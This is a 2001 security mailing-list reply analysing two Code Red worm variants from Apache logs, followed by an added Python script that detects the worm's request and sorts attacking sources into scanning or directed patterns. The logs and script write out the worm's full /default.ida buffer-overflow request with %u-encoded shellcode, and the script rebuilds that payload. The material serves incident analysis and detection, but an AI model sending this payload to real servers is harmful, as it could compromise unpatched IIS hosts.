On Fri, Jul 20, 2001 at 05:30:16PM +0100, Chris Paget wrote:

> The only conclusion is that there is another version of the "Code Red"
> worm in the wild, which has a correct randomisation routine (and
> possibly other differences).
>

As I posted yesterday, and followed up by more log parsing done this morning, all the evidence I have points to this conclusion as well. Logs at three sites show two different types of attacks:

1) A large netblock port scan, followed up by a targeted attack to open HTTP ports along the scan.

2) Random attacks, by a single host against a single host, with no follow-up or hint of an impending attack.

The attacks on my home netblock (a /28 on a DSL connection) were skewed about 60/40 in favor of the scanning variant, and there were 65 total attacks through the six-hour period between 1000 PDT and 1600 PDT (1800 - 0000 GMT). Attacks on my corporate and production networks (discontiguous netblocks through a colo) were not only stacked about 90/10 in favor of the random directed variant, but were also over 100x greater in frequency during the same time period. Also, the frequency of the scanning variant attacks dropped off during the time period, while the frequency of the random directed version increased. I saw no scanning attacks after about 1445 PDT.

This suggests that the random directed variant is more virulent, and also (unless I'm just lucky) has some sort of logic which puts a lesser weight on known cable/DSL/dial-up netblocks, and a higher one on netblocks with more legitimate targets.
> The GET request logged by the second worm variant is as follows:
>
> GET /default.ida
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
>
> Firstly, can someone confirm whether this is the same as the GET
> request logged by the hard-coded worm?
>

The first request was from a scanning attack:

12.39.137.80 - - [19/Jul/2001:10:32:27 -0700] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 322

The second request is from a random directed attack:

203.127.71.178 - - [19/Jul/2001:16:31:47 -0700] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 322

Both were taken from my home Apache 1.3.19 webserver. They are identical.

> I intend to add egress filters to one of my servers and allow it to
> become infected; if anyone wants to volunteer to help me pick it apart
> afterwards it would be appreciated.

My disassembly skills are non-existent, but I and I'm sure the community would love to hear the results.

-- 
"A true friend stabs you in the front."
 - Oscar Wilde
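An added example, not part of the original post or the poster's own tooling, of the log parsing described above: it picks the Code Red request out of Apache common-log lines and sorts sources into the two patterns the message describes, scanning (one source probing several hosts in our netblock) versus directed (one source hitting a single host). The host names, private source addresses and sample lines are constructed; the payload string is the one quoted in the post.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache common log format, the layout of the two log lines quoted in the post.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+$')
# Code Red probe: GET /default.ida? + a long run of N padding (224 in the captured
# requests) + %u-encoded payload ending in "=a" (its final %u group has two digits).
CODERED_RE = re.compile(
    r'^GET /default\.ida\?N{200,}(?:%u[0-9a-fA-F]{2,4})+=a HTTP/1\.[01]$')
# Payload tail exactly as logged in the post; the N run is generated, not typed.
PAYLOAD = 'N' * 224 + ('%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3'
                       '%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a')

def parse_line(line):
    """Return (source_ip, timestamp, request) or None for a line that does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    return m['ip'], datetime.strptime(m['ts'], '%d/%b/%Y:%H:%M:%S %z'), m['req']

def is_code_red(request):
    return CODERED_RE.match(request) is not None

def classify_sources(host_logs):
    """host_logs maps each of our web hosts to its log lines.  A source that probed
    several of our hosts is 'scanning' (the netblock-walking variant); one that hit a
    single host is 'directed' (random single-host).  Returns {ip: (variant, probes)}."""
    targets, hits = defaultdict(set), defaultdict(int)
    for host, lines in host_logs.items():
        for rec in filter(None, map(parse_line, lines)):
            if is_code_red(rec[2]):
                targets[rec[0]].add(host)
                hits[rec[0]] += 1
    return {ip: ('scanning' if len(t) > 1 else 'directed', hits[ip])
            for ip, t in targets.items()}

def probe(ip, ts):  # constructed log line carrying the Code Red request
    return f'{ip} - - [{ts}] "GET /default.ida?{PAYLOAD} HTTP/1.0" 400 322'

# Constructed sample: two hosts in one /28.  10.0.0.5 probes both (scanning),
# 10.0.0.9 probes one host only (directed); the 192.0.2.77 line is benign traffic.
SAMPLE_LOGS = {
    'www1': [probe('10.0.0.5', '19/Jul/2001:10:32:27 -0700'),
             '192.0.2.77 - - [19/Jul/2001:10:40:00 -0700] "GET /index.html HTTP/1.0" 200 1043',
             probe('10.0.0.9', '19/Jul/2001:16:31:47 -0700')],
    'www2': [probe('10.0.0.5', '19/Jul/2001:10:32:29 -0700')],
}
```

Feeding it the real per-host access logs for the attack window gives the scanning/directed split per source, which is the figure the post reports as 60/40 and 90/10.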
This archive was generated by hypermail 2b30 : Fri Jul 20 2001 - 11:37:12 PDT